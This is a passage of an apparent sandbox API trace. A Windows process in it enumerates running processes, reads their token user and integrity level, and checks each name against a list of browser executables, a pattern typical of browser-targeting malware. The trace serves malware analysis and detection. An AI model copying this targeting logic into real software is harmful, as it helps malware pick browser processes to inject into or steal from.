IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.001] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.001] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.001] GetLastError () returned 0x7a [0233.001] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.001] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.001] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.001] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0233.001] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0233.001] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0233.001] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0233.001] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0233.001] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0233.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0233.001] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.001] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.001] GetLastError () returned 0x7a [0233.001] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.001] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.001] CloseHandle (hObject=0x340) returned 1 [0233.001] CloseHandle (hObject=0x548) returned 1 [0233.001] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.001] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.002] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.002] GetLastError () returned 0x7a [0233.002] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.002] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.002] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.002] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0233.002] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0233.002] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0233.002] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0233.002] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0233.002] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0233.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0233.002] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.002] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.002] GetLastError () returned 0x7a [0233.002] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.002] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.002] CloseHandle (hObject=0x340) returned 1 [0233.002] CloseHandle (hObject=0x548) returned 1 [0233.002] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.002] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.002] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.002] GetLastError () returned 0x7a [0233.002] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.003] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.003] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.003] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0233.003] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0233.003] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0233.003] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0233.003] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0233.003] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0233.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0233.003] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.003] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.003] GetLastError () returned 0x7a [0233.003] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.003] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.003] CloseHandle (hObject=0x340) returned 1 [0233.003] CloseHandle (hObject=0x548) returned 1 [0233.003] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.003] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.003] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.003] GetLastError () returned 0x7a [0233.003] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.003] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.003] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.003] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0233.003] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0233.003] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0233.003] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0233.004] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0233.004] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0233.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0233.004] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.004] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.004] GetLastError () returned 0x7a [0233.004] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.004] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.004] CloseHandle (hObject=0x340) returned 1 [0233.004] CloseHandle (hObject=0x548) returned 1 [0233.004] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.004] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.004] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.004] GetLastError () returned 0x7a [0233.004] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.004] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.004] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.004] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.004] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0233.004] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.004] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.004] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.004] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0233.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0233.004] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.004] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.005] GetLastError () returned 0x7a [0233.005] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.005] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.005] CloseHandle (hObject=0x340) returned 1 [0233.005] CloseHandle (hObject=0x548) returned 1 [0233.005] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.005] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.005] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.005] GetLastError () returned 0x7a [0233.005] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.005] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.005] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.005] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0233.005] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0233.005] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0233.005] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0233.005] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0233.005] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0233.005] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0233.005] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.005] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.005] GetLastError () returned 0x7a [0233.005] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.005] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.005] CloseHandle (hObject=0x340) returned 1 [0233.005] CloseHandle (hObject=0x548) returned 1 [0233.006] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.006] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.006] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.006] GetLastError () returned 0x7a [0233.006] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.006] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.006] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.006] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0233.006] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0233.006] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.006] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.006] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.006] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0233.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0233.006] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.006] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.006] GetLastError () returned 0x7a [0233.006] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.006] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.006] CloseHandle (hObject=0x340) returned 1 [0233.006] CloseHandle (hObject=0x548) returned 1 [0233.006] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.006] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.006] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.006] GetLastError () returned 0x7a [0233.007] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.007] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.007] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.007] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0233.007] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0233.007] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0233.007] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0233.007] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0233.007] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0233.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x548 [0233.007] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.007] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.007] GetLastError () returned 0x7a [0233.007] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0233.007] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.007] CloseHandle (hObject=0x340) returned 1 [0233.007] CloseHandle (hObject=0x548) returned 1 [0233.007] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.007] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.007] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.007] GetLastError () returned 0x7a [0233.007] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.007] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.007] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.007] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0233.007] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0233.007] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0233.007] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0233.007] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0233.008] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0233.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0233.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0233.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0233.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0233.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0233.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0233.008] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0233.008] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0233.008] GetLastError () returned 0x7a [0233.008] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) 